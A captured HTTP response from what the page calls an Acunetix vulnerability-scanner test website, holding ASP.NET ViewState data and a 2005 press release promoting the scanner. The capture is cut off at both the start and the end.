BgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ944e4UqgWJpySuZGYD9y7m9ZXo%2FQ%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30486
          
          
          Response body (30486 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp/UCAuadp/UCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl+YFAuadl+YFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C+6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DyY4AmtQ6l9yclXqngVcemir9JWK" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
